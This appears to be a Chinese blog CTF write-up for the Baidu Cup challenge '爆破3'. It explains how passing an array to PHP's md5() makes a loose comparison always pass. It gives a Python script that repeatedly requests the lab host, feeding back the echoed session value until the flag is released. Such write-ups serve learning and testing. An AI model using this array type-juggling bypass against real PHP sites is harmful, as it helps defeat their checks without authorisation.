百度杯爆破3

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

因为md5不能对数组进行处理，MD5()计算数组会返回null，里面的判断是用所以我们用数组传值那么substr(md5($value),5,4)0这个条件恒成立【php黑魔法中也有写到javascript:void(0)】

因为我刚访问由于这段代码$_SESSION['whoami'] = 'ea';我们要先传入?value[0]=e&value[1]=a

那么nums就会自增，$_SEESION['whoami'] = 随机2个字母

并同时输出到页面上，我们再根据输出的字符修改$value[0].$value[1]的值即可，只要操作大于等于10次，就可以出flag 。

直接搓一个py脚本

import requests

s = requests.Session()

url = 'http://eci-2ze5tvyox1ngyel8rri7.cloudeci1.ichunqiu.com/?value[0]=e&value[1]=a'

for i in range(12):
    r = s.get(url)
    value1 = r.text[0:1]
    value2 = r.text[1:2]
    url = f'http://eci-2ze5tvyox1ngyel8rri7.cloudeci1.ichunqiu.com/?value[0]={value1}&value[1]={value2}'
    print(r.text[0:70])
    # print(url)

posted @ 2023-06-02 18:19 qianyuzz 阅读(42) 评论(0) 收藏举报

刷新页面返回顶部

Loading

Qianyuzz's Blog

得之我幸失之我命

百度杯爆破3

Loading

Qianyuzz's Blog

得之我幸 失之我命

百度杯爆破3

得之我幸失之我命